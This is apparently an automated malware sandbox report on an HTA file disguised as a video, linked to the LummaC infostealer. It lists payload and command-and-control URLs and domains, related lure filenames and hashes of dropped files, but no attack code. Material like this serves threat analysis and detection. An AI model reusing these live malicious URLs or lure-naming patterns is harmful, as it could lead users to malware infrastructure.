                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  re5.mp4.hta0%ReversingLabs
                  re5.mp4.hta5%VirustotalBrowse
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://permissiblene.click/apiU)r0%Avira URL Cloudsafe
                  https://t1.awagama2.org0%Avira URL Cloudsafe
                  https://t1.awagama2.org/scheele.pt0%Avira URL Cloudsafe
                  permissiblene.click0%Avira URL Cloudsafe
                  https://klipvumisui.shop/100%Avira URL Cloudmalware
                  https://permissiblene.click/0%Avira URL Cloudsafe
                  https://klipvumisui.shop/int_clp_sha.txtH100%Avira URL Cloudmalware
                  https://permissiblene.click/api0%Avira URL Cloudsafe
                  https://klipvumisui.shop:443/int_clp_sha.txt100%Avira URL Cloudmalware
                  https://aka..FT_0%Avira URL Cloudsafe
                  https://klipvumisui.shop/h100%Avira URL Cloudmalware
                  https://klipvumisui.shop/int_clp_sha.txts100%Avira URL Cloudmalware
                  https://t1.awagam0%Avira URL Cloudsafe
                  https://klipvumisui.shop/int_clp_sha.txtr100%Avira URL Cloudmalware
                  https://t1.awagama2.org/Scheele.LRsq0%Avira URL Cloudsafe
                  https://permissiblene.click:443/api0%Avira URL Cloudsafe
                  https://t1.awagama2.org/Scheele.pLRsq0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  permissiblene.click
                  188.114.96.3
                  truetrue
                    unknown
                    t1.awagama2.org
                    188.114.97.3
                    truetrue
                      unknown
                      klipvumisui.shop
                      104.21.37.128
                      truefalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        scentniej.buzzfalse
                          high
                          https://permissiblene.click/apitrue
                          • Avira URL Cloud: safe
                          unknown
                          permissiblene.clicktrue
                          • Avira URL Cloud: safe
                          unknown
                          rebuildeso.buzzfalse
                            high
                            appliacnesot.buzzfalse
                              high
                              screwamusresz.buzzfalse
                                high
                                cashfuzysao.buzzfalse
                                  high
                                  inherineau.buzzfalse
                                    high
                                    prisonyfork.buzzfalse
                                      high
                                      hummskitnj.buzzfalse
                                        high
                                        https://t1.awagama2.org/Scheele.pttrue
                                          unknown
                                          https://klipvumisui.shop/int_clp_sha.txtfalse
                                            high
                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2058549903.0000000005B59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2824318533.0000000005BC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000009.00000002.3040273310.0000000005281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://klipvumisui.shop/int_clp_sha.txtHpowershell.exe, 00000008.00000002.3010678898.00000000055A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                https://klipvumisui.shop:443/int_clp_sha.txtpowershell.exe, 00000008.00000002.3001201192.00000000030AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: malware
                                                unknown
                                                http://ocsp.vikingcloud.com/0Apowershell.exe, 00000008.00000002.3011067943.00000000055B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.2824318533.0000000004CB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000009.00000002.3040273310.0000000005281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://crl.microsoftpowershell.exe, 00000004.00000002.2859045142.00000000074BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.2824318533.0000000004CB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://go.micropowershell.exe, 00000002.00000002.2053184182.0000000005104000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://permissiblene.click/powershell.exe, 00000008.00000002.3009863831.0000000005520000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://certs.securetrust.com/issuers/VCTWGTSCA_L1.crt0powershell.exe, 00000008.00000002.3011067943.00000000055B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://contoso.com/Licensepowershell.exe, 00000004.00000002.2824318533.0000000005BC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://contoso.com/Iconpowershell.exe, 00000004.00000002.2824318533.0000000005BC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://aka..FT_powershell.exe, 00000009.00000002.3031345788.0000000003111000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://t1.awagama2.orgpowershell.exe, 00000004.00000002.2824318533.0000000004CB7000.00000004.00000800.00020000.00000000.sdmptrue
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://aka.ms/pscore6lBsqpowershell.exe, 00000002.00000002.2053184182.0000000004AF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2824318533.0000000004B61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3040273310.0000000005131000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.2824318533.0000000004CB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://klipvumisui.shop/powershell.exe, 00000008.00000002.3005785621.00000000030BA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3001201192.0000000003047000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://t1.awagama2.org/scheele.ptpowershell.exe, 00000004.00000002.2823673886.0000000003087000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://crl.micropowershell.exe, 00000009.00000002.3125696403.000000000782D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://permissiblene.click/apiU)rpowershell.exe, 00000008.00000002.3009863831.0000000005520000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://klipvumisui.shop/int_clp_sha.txtspowershell.exe, 00000008.00000002.3010678898.00000000055A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000009.00000002.3040273310.0000000005281000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://contoso.com/powershell.exe, 00000004.00000002.2824318533.0000000005BC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://klipvumisui.shop/int_clp_sha.txtrpowershell.exe, 00000008.00000002.3010678898.00000000055A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            unknown
                                                                            https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2058549903.0000000005B59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2824318533.0000000005BC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0powershell.exe, 00000008.00000002.3011067943.00000000055B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://klipvumisui.shop/hpowershell.exe, 00000008.00000002.3005785621.00000000030BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                unknown
                                                                                https://t1.awagampowershell.exe, 00000002.00000002.2052003565.0000000002DC6000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://certs.securetrust.com/CA0powershell.exe, 00000008.00000002.3011067943.00000000055B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://t1.awagama2.org/Scheele.LRsqpowershell.exe, 00000002.00000002.2053184182.0000000005104000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://permissiblene.click:443/apipowershell.exe, 00000008.00000002.3001201192.00000000030AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2053184182.0000000004AF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2824318533.0000000004B61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3040273310.0000000005131000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://t1.awagama2.org/Scheele.pLRsqpowershell.exe, 00000002.00000002.2053184182.0000000005104000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://crl.trustwave.com/TWGCA.crl0npowershell.exe, 00000008.00000002.3010448615.000000000559C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs
                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      104.21.37.128
                                                                                      klipvumisui.shopUnited States
                                                                                      13335CLOUDFLARENETUSfalse
                                                                                      188.114.97.3
                                                                                      t1.awagama2.orgEuropean Union
                                                                                      13335CLOUDFLARENETUStrue
                                                                                      188.114.96.3
                                                                                      permissiblene.clickEuropean Union
                                                                                      13335CLOUDFLARENETUStrue
                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1582681
                                                                                      Start date and time:2024-12-31 09:24:09 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 7m 13s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Number of analysed new started processes analysed:11
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:re5.mp4.hta
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.spyw.evad.winHTA@12/10@3/3
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 40%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 97%
                                                                                      • Number of executed functions: 209
                                                                                      • Number of non-executed functions: 98
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .hta
                                                                                      • Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 184.28.90.27, 13.107.246.45, 4.245.163.56
                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                      • Execution Graph export aborted for target mshta.exe, PID 764 because there are no executed function
                                                                                      • Execution Graph export aborted for target powershell.exe, PID 4524 because it is empty
                                                                                      • Execution Graph export aborted for target powershell.exe, PID 6388 because it is empty
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      TimeTypeDescription
                                                                                      03:25:03API Interceptor81x Sleep call for process: powershell.exe modified
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      104.21.37.128Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                        Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                          #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                            @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                    188.114.97.3RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.rgenerousrs.store/o362/
                                                                                                    A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.beylikduzu616161.xyz/2nga/
                                                                                                    Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                                                                    • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
                                                                                                    ce.vbsGet hashmaliciousUnknownBrowse
                                                                                                    • paste.ee/d/lxvbq
                                                                                                    Label_00000852555.doc.jsGet hashmaliciousUnknownBrowse
                                                                                                    • tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
                                                                                                    PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.ssrnoremt-rise.sbs/3jsc/
                                                                                                    QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • filetransfer.io/data-package/zWkbOqX7/download
                                                                                                    http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                                    • kklk16.bsyo45ksda.top/favicon.ico
                                                                                                    gusetup.exeGet hashmaliciousUnknownBrowse
                                                                                                    • www.glarysoft.com/update/glary-utilities/pro/pro50/
                                                                                                    Online Interview Scheduling Form.lnkGet hashmaliciousDucktailBrowse
                                                                                                    • gmtagency.online/api/check
                                                                                                    188.114.96.3QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • filetransfer.io/data-package/u7ghXEYp/download
                                                                                                    CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.mffnow.info/1a34/
                                                                                                    A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.mydreamdeal.click/1ag2/
                                                                                                    SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.questmatch.pro/ipd6/
                                                                                                    QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • filetransfer.io/data-package/I7fmQg9d/download
                                                                                                    need quotations.exeGet hashmaliciousFormBookBrowse
                                                                                                    • www.rtpwslot888gol.sbs/jmkz/
                                                                                                    QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                    • filetransfer.io/data-package/Bh1Kj4RD/download
                                                                                                    http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                                    • kklk16.bsyo45ksda.top/favicon.ico
                                                                                                    QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                    • filetransfer.io/data-package/XrlEIxYp/download
                                                                                                    QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                    • filetransfer.io/data-package/XrlEIxYp/download
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    klipvumisui.shopsetup.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 172.67.208.58
                                                                                                    Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.37.128
                                                                                                    Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.37.128
                                                                                                    #Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.37.128
                                                                                                    installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 172.67.208.58
                                                                                                    @Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                    • 104.21.37.128
                                                                                                    MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 172.67.208.58
                                                                                                    installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                    • 104.21.37.128
                                                                                                    !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                    • 104.21.37.128
                                                                                                    @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 172.67.208.58
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    CLOUDFLARENETUSfile.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 188.114.96.3
                                                                                                    zku4YyCG6L.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 188.114.96.3
                                                                                                    hca5qDUYZH.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 188.114.96.3
                                                                                                    PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                    • 188.114.96.3
                                                                                                    DIS_37745672.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                                    • 104.17.247.203
                                                                                                    Poket.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                    • 188.114.97.3
                                                                                                    https://nutricarm.es/wp-templates/f8b83.phpGet hashmaliciousUnknownBrowse
                                                                                                    • 104.21.96.1
                                                                                                    Exlan_setup_v3.1.2.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 172.67.157.254
                                                                                                    RtU8kXPnKr.exeGet hashmaliciousQuasarBrowse
                                                                                                    • 104.26.12.205
                                                                                                    http://ghostbin.cafe24.com/Get hashmaliciousUnknownBrowse
                                                                                                    • 104.18.27.193
                                                                                                    CLOUDFLARENETUSfile.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 188.114.96.3
                                                                                                    zku4YyCG6L.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 188.114.96.3
                                                                                                    hca5qDUYZH.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 188.114.96.3
                                                                                                    PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                    • 188.114.96.3
                                                                                                    DIS_37745672.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                                    • 104.17.247.203
                                                                                                    Poket.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                    • 188.114.97.3
                                                                                                    https://nutricarm.es/wp-templates/f8b83.phpGet hashmaliciousUnknownBrowse
                                                                                                    • 104.21.96.1
                                                                                                    Exlan_setup_v3.1.2.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 172.67.157.254
                                                                                                    RtU8kXPnKr.exeGet hashmaliciousQuasarBrowse
                                                                                                    • 104.26.12.205
                                                                                                    http://ghostbin.cafe24.com/Get hashmaliciousUnknownBrowse
                                                                                                    • 104.18.27.193
                                                                                                    CLOUDFLARENETUSfile.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 188.114.96.3
                                                                                                    zku4YyCG6L.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 188.114.96.3
                                                                                                    hca5qDUYZH.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 188.114.96.3
                                                                                                    PO_2024_056209_MQ04865_ENQ_1045.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                    • 188.114.96.3
                                                                                                    DIS_37745672.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                                    • 104.17.247.203
                                                                                                    Poket.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                    • 188.114.97.3
                                                                                                    https://nutricarm.es/wp-templates/f8b83.phpGet hashmaliciousUnknownBrowse
                                                                                                    • 104.21.96.1
                                                                                                    Exlan_setup_v3.1.2.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 172.67.157.254
                                                                                                    RtU8kXPnKr.exeGet hashmaliciousQuasarBrowse
                                                                                                    • 104.26.12.205
                                                                                                    http://ghostbin.cafe24.com/Get hashmaliciousUnknownBrowse
                                                                                                    • 104.18.27.193
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 188.114.97.3
                                                                                                    Poket.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                    • 188.114.97.3
                                                                                                    Fizzy Loader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                    • 188.114.97.3
                                                                                                    Epsilon.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 188.114.97.3
                                                                                                    XClient.exeGet hashmaliciousXWormBrowse
                                                                                                    • 188.114.97.3
                                                                                                    hoEtvOOrYH.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                    • 188.114.97.3
                                                                                                    web44.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                    • 188.114.97.3
                                                                                                    random.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 188.114.97.3
                                                                                                    eXbhgU9.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 188.114.97.3
                                                                                                    Supplier.batGet hashmaliciousUnknownBrowse
                                                                                                    • 188.114.97.3
                                                                                                    a0e9f5d64349fb13191bc781f81f42e1Poket.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.37.128
                                                                                                    • 188.114.96.3
                                                                                                    Exlan_setup_v3.1.2.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.37.128
                                                                                                    • 188.114.96.3
                                                                                                    Set-up.exeGet hashmaliciousLummaC, GO Backdoor, LummaC StealerBrowse
                                                                                                    • 104.21.37.128
                                                                                                    • 188.114.96.3
                                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.37.128
                                                                                                    • 188.114.96.3
                                                                                                    X-mas_2.3.2.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.37.128
                                                                                                    • 188.114.96.3
                                                                                                    ReploidReplic.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.37.128
                                                                                                    • 188.114.96.3
                                                                                                    Bootstrapper.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.37.128
                                                                                                    • 188.114.96.3
                                                                                                    Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.37.128
                                                                                                    • 188.114.96.3
                                                                                                    GTA-5-Mod-Menu-2025.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.37.128
                                                                                                    • 188.114.96.3
                                                                                                    AquaDiscord-2.0.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.37.128
                                                                                                    • 188.114.96.3
                                                                                                    No context
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5829
                                                                                                    Entropy (8bit):4.901113710259376
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                                                    MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                                                    SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                                                    SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                                                    SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                                                    Malicious:false
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):64
                                                                                                    Entropy (8bit):1.0505636700495735
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Nlllul2/Z:NllU
                                                                                                    MD5:AA975DFAF7DC245B492F5CD872985B48
                                                                                                    SHA1:AE2443AD46011F60DCF5A88401B28B678FB57F5C
                                                                                                    SHA-256:8590E560AF3B6CC3CF1159B19C3F594B704E40A1C469468CD5E176396243FDCA
                                                                                                    SHA-512:8B62B08C97F08D86116D3DCC795748BBF3FB5462BE17BF5C8F07C276057DC7F40E8DAE33B1B4DF0FA25F047A001176AC21663FE4E3F73724F80B13C80B89F04E
                                                                                                    Malicious:false
                                                                                                    Preview:@...e................................................@..........
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
